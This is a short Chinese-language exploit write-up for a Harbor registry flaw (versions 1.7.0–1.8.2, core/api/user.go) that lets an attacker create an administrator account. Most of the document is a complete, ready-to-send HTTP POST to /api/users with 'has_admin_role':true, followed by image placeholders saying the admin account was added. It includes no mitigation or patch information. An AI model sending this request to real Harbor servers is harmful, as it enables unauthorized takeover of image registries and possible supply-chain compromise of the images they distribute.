Harbor是一个用于存储和分发Docker镜像的企业级Registry服务器。Harbor 1.7.0版本至1.8.2版本中的core/api/user.go文件存在安全漏洞。攻击者通过在请求中添加关键参数,即可利用该漏洞创建管理员账户,从而接管Harbor镜像仓库。

    1. POST /api/users HTTP/1.1
    2. Host: x.x.x.x:8080
    3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
    4. Accept: application/json
    5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    6. Accept-Encoding: gzip, deflate
    7. Content-Type: application/json
    8. Cache-Control: no-cache
    9. Pragma: no-cache
    10. Connection: close
    11. Referer: http://x.x.x.x:8080/
    12. Content-Length: 133
    14. {"username":"hw","email":"test@test.cn","realname":"hw","password":"Admin123","comment":"1","has_admin_role":true,"t0f9phmw4j":"="}

    图片.png
    管理员添加成功:图片.png